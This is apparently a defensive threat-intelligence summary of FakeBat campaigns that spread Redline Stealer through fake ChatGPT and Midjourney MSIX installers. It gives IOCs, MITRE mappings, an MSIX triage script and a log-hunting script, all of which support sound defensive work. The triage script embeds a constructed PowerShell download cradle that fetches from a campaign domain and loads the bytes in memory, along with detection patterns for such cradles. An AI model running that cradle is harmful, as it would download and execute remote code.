FakeBat Impersonates Midjourney, ChatGPT in Drive-by Cyberattacks

eSentire’s Threat Response Unit (TRU) uncovered FakeBat campaigns delivering Redline Stealer via MSIX installers impersonating ChatGPT and Midjourney. Google Search Ads drive victims to imposter download pages, and the packages are built with Advanced Installer so that a PowerShell script runs alongside a benign-looking executable. That script loads Redline into memory, while the bundled executable displays the real ChatGPT or Midjourney site to mask the intrusion. hashtags #FakeBat #RedlineStealer #ChatGPT #Midjourney #AshanaGlobalLtd

Keypoints

  • TRU identified FakeBat campaigns delivering Redline Stealer via MSIX installers impersonating AI tools (ChatGPT and Midjourney).
  • The campaigns use Google Search Ads to drive victims to imposter download pages for AI tools.
  • MSIX packages are signed by ASHANA GLOBAL LTD and built with Advanced Installer, including executable and PowerShell components.
  • Chat.ps1 downloads Redline Stealer from adv-pardorudy[.]ru and communicates with a C2 panel (Start.php and Install.php) to log infection metrics.
  • The Redline sample is configured to connect to 185.161.248[.]81 with Bot ID “ChatGPT_Mid.”
  • ChatGPT.exe loads the real ChatGPT site via Edge WebView2 after installation to persuade users the app is legitimate.
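The keypoints above describe a package layout that can be triaged statically: an MSIX is a ZIP container, so the publisher in AppxManifest.xml, any embedded PowerShell, and a Package Support Framework hook that launches it can all be read without installing anything. The script below is an added example, not eSentire’s tooling; the sample package it builds is a constructed look-alike of the reported layout (the manifest text, the PSF config.json field names and the stand-in Chat.ps1 body are assumptions, the publisher name and domains are the report’s IOCs), and the script patterns it flags are generic download-cradle and in-memory-load indicators rather than campaign-specific signatures.

```python
"""Static triage of an MSIX package for the FakeBat tradecraft described above."""
import io
import json
import re
import zipfile
import xml.etree.ElementTree as ET

# IOCs taken from the report (undefanged so they match raw script text).
KNOWN_BAD_PUBLISHERS = {"ASHANA GLOBAL LTD"}
KNOWN_BAD_DOMAINS = {"advert-job.ru", "job-lionserver.site",
                     "jokeadvert.ru", "adv-pardorudy.ru"}

# Generic script behaviours worth flagging in any MSIX, not just this campaign.
SCRIPT_PATTERNS = [
    (r"Invoke-WebRequest|DownloadString|DownloadData|Net\.WebClient", "download cradle"),
    (r"Reflection\.Assembly\]::Load", "in-memory assembly load"),
    (r"-EncodedCommand|FromBase64String", "encoded content"),
]


def build_sample_msix() -> bytes:
    """Constructed stand-in for Chat-GPT-x64.msix (assumed layout, not the real sample)."""
    manifest = (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10">'
        '<Identity Name="ChatGPT" Publisher="CN=ASHANA GLOBAL LTD" Version="1.0.0.0"/>'
        '<Properties><DisplayName>ChatGPT</DisplayName></Properties>'
        '</Package>'
    )
    # PSF config.json: the startScript hook is the mechanism Advanced Installer
    # uses to run a PowerShell script at launch (field names assumed from the PSF schema).
    psf = {"applications": [{"id": "ChatGPT", "executable": "ChatGPT.exe",
                             "startScript": {"scriptPath": "Chat.ps1"}}]}
    # Constructed stand-in for Chat.ps1: fetch bytes and load them as a .NET assembly.
    script = (
        "$u = 'https://adv-pardorudy.ru/payload'\n"
        "$b = (New-Object Net.WebClient).DownloadData($u)\n"
        "[System.Reflection.Assembly]::Load($b) | Out-Null\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AppxManifest.xml", manifest)
        z.writestr("config.json", json.dumps(psf))
        z.writestr("Chat.ps1", script)
        z.writestr("ChatGPT.exe", b"MZ\x90\x00")  # placeholder bytes, not a real PE
    return buf.getvalue()


def triage_msix(data: bytes) -> dict:
    """Return publisher, display name, script inventory, PSF hooks and findings."""
    result = {"publisher": None, "display_name": None,
              "scripts": [], "psf_hooks": [], "findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "AppxManifest.xml" in names:
            root = ET.fromstring(z.read("AppxManifest.xml"))
            ident = root.find("{*}Identity")  # namespace-agnostic lookup (Python 3.8+)
            if ident is not None:
                result["publisher"] = ident.get("Publisher")
            dn = root.find("{*}Properties/{*}DisplayName")
            if dn is not None:
                result["display_name"] = dn.text
        result["scripts"] = [n for n in names
                             if n.lower().endswith((".ps1", ".bat", ".cmd", ".vbs", ".js"))]
        if "config.json" in names:
            try:
                cfg = json.loads(z.read("config.json"))
                for app in cfg.get("applications", []):
                    for hook in ("startScript", "endScript"):
                        if hook in app:
                            result["psf_hooks"].append(
                                (app.get("id"), hook, app[hook].get("scriptPath")))
            except ValueError:
                result["findings"].append("config.json present but not valid JSON")
        for name in result["scripts"]:
            text = z.read(name).decode("utf-8", errors="replace")
            for pattern, label in SCRIPT_PATTERNS:
                if re.search(pattern, text, re.IGNORECASE):
                    result["findings"].append(f"{name}: {label}")
            for domain in KNOWN_BAD_DOMAINS:
                if domain in text.lower():
                    result["findings"].append(f"{name}: references IOC domain {domain}")
    pub = (result["publisher"] or "").upper()
    if any(bad in pub for bad in KNOWN_BAD_PUBLISHERS):
        result["findings"].append(f"publisher matches IOC: {result['publisher']}")
    if result["psf_hooks"]:
        result["findings"].append("PSF script hook present: "
                                  + ", ".join(h[2] or "?" for h in result["psf_hooks"]))
    return result


if __name__ == "__main__":
    for key, value in triage_msix(build_sample_msix()).items():
        print(f"{key}: {value}")
```

Point `triage_msix` at the bytes of a real package to get the same report; a PSF script hook combined with a download-and-load pattern in the hooked script is the combination that should stop an install regardless of whether the publisher is already on a blocklist.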

MITRE Techniques

  • [T1189] Drive-by Compromise – Campaign used Google Search Ads to deliver imposter web pages for ChatGPT and Midjourney. [In early May, eSentire Threat Response Unit (TRU) identified an ongoing FakeBat campaign using Google Search Ads to deliver imposter web pages for ChatGPT and Midjourney.]
  • [T1036] Masquerading – Impersonating major brands and services using Google Search Ads. [This campaign bears several similarities to previously identified FakeBat activity: Impersonating major brands and services using Google Search Ads.]
  • [T1027] Obfuscated Files or Information – Obfuscated PowerShell script (Chat-Ready.ps1). [In this case it executes an obfuscated PowerShell script (Chat-Ready.ps1), which ultimately is identical to the script shown in Figure 13 …]
  • [T1059.001] PowerShell – PowerShell-based components used during installation. [Chat.ps1 is a basic PowerShell download cradle …]
  • [T1105] Ingress Tool Transfer – Downloading and loading Redline Stealer from a remote host. [Chat.ps1 downloads and loads Redline Stealer from adv-pardorudy[.]ru into memory as an assembly.]
  • [T1071.001] Web Protocols – C2 communications via HTTP requests to Start.php and Install.php. [three web requests to signal infection start, payload retrieval and successful installation of Redline.]
  • [T1204] User Execution – Users interact with imposter ads/pages leading to the installer execution. [The infection flow begins with a Google search leading to an imposter download page and a Windows App Installer wizard.]

Indicators of Compromise

  • [URL] hxxps://pcmartusa[.]com/gpt/ – Imposter download page for ChatGPT
  • [Domain] advert-job[.]ru – FakeBat Payload Hosting/C2
  • [Domain] job-lionserver[.]site – FakeBat Payload Hosting
  • [Hash] 86a9728fd66d70f0ce8ef945726c2b77 – Chat-GPT-x64.msix
  • [Hash] cfe067ccaa39fb203af404e1d42cb739 – Chat.ps1
  • [Hash] 33ee0bb76f93a82bbab5fd4b2a903291 – ChatGPT.exe
  • [Hash] 906f7ddf43b924f399518b1a0f23ed4f – Midjourney-x64.msix
  • [Hash] c29215ddcd02477252e96e4cb33bd29d – Midjourney.exe
  • [Hash] 50be501494f981065825f44dddf693f3 – Chat-Ready.ps1
  • [Domain] jokeadvert[.]ru – FakeBat C2
  • [Domain] adv-pardorudy[.]ru – Redline Payload
  • [Hash] 7716f2344bcebd4b040077fc00fdb543 – Redline Stealer
  • [IP] 185.161.248[.]81 – Redline Stealer C2
  • [Domain] chatgpt-t[.]com – FakeBat domain registered earlier in related activity
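The indicators above are most useful when correlated rather than matched one at a time: the report describes a host signalling Start.php, fetching the payload, and then signalling Install.php, so a source that completes that sequence on a FakeBat C2 domain has finished the install, and any connection to the Redline C2 address is a high-confidence hit on its own. The hunting script below is an added example, not eSentire’s detection content; the proxy log lines are constructed (timestamps, internal addresses and the simple "timestamp src method host path" layout are assumptions), while the domains, IP and endpoint names come from the report.

```python
"""Correlate FakeBat/Redline IOCs across web proxy log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# IOC sets from the report (undefanged for matching).
FAKEBAT_C2_DOMAINS = {"advert-job.ru", "jokeadvert.ru"}
FAKEBAT_HOSTING = {"job-lionserver.site", "adv-pardorudy.ru"}
REDLINE_C2_IPS = {"185.161.248.81"}
LURE_PAGES = {("pcmartusa.com", "/gpt/")}
C2_ENDPOINTS = {"/start.php", "/install.php"}

# Assumed log layout: "<ISO timestamp> <src ip> <method> <host[:port]><path>".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>[^/\s]+)(?P<path>/\S*)")

# Constructed sample traffic for one infected host (10.1.2.3) and one that only
# touched a C2 domain (10.1.2.9); not taken from the report.
SAMPLE_LOG = """\
2024-05-06T10:00:01Z 10.1.2.3 GET pcmartusa.com/gpt/
2024-05-06T10:00:15Z 10.1.2.3 GET advert-job.ru/Start.php
2024-05-06T10:00:16Z 10.1.2.3 GET adv-pardorudy.ru/payload
2024-05-06T10:00:20Z 10.1.2.3 GET advert-job.ru/Install.php
2024-05-06T10:00:25Z 10.1.2.3 CONNECT 185.161.248.81:443/
2024-05-06T10:03:00Z 10.1.2.9 GET example.com/Install.php
2024-05-06T10:04:00Z 10.1.2.9 GET jokeadvert.ru/Start.php
"""


def parse_line(line: str):
    """Return a dict with ts/src/host/path, or None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["host"] = ev["host"].split(":")[0].lower()      # drop port from CONNECT targets
    ev["path"] = ev["path"].split("?")[0].lower()      # ignore query string
    return ev


def hunt(log_text: str, window: timedelta = timedelta(minutes=10)) -> list:
    """Return (src, alert, host) tuples; Install.php is only 'complete' if Start.php preceded it."""
    alerts = []
    starts = defaultdict(list)  # src -> timestamps of Start.php beacons to C2 domains
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        src, host, path, ts = ev["src"], ev["host"], ev["path"], ev["ts"]
        if any(host == h and path.startswith(p) for h, p in LURE_PAGES):
            alerts.append((src, "lure_page_visit", host))
        if host in FAKEBAT_HOSTING:
            alerts.append((src, "fakebat_payload_fetch", host))
        if host in REDLINE_C2_IPS:
            alerts.append((src, "redline_c2", host))
        if host in FAKEBAT_C2_DOMAINS and path in C2_ENDPOINTS:
            if path == "/start.php":
                starts[src].append(ts)
                alerts.append((src, "fakebat_infection_start", host))
            elif any(timedelta(0) <= ts - t <= window for t in starts[src]):
                alerts.append((src, "fakebat_install_complete", host))
            else:
                alerts.append((src, "fakebat_install_without_start", host))
    return alerts


def compromised_hosts(alerts: list) -> list:
    """Hosts that completed the install sequence or reached the Redline C2."""
    confirmed = {"fakebat_install_complete", "redline_c2"}
    return sorted({src for src, kind, _ in alerts if kind in confirmed})


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG)
    for src, kind, host in found:
        print(f"{src}  {kind:32} {host}")
    print("confirmed:", compromised_hosts(found))
```

The lure-page and Start.php hits are worth a ticket on their own since they show a user reached the imposter page, but only the completed Start/Install sequence or the Redline C2 connection should trigger host isolation; a host that only hit the lure page may have closed the App Installer wizard.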

Read more: https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks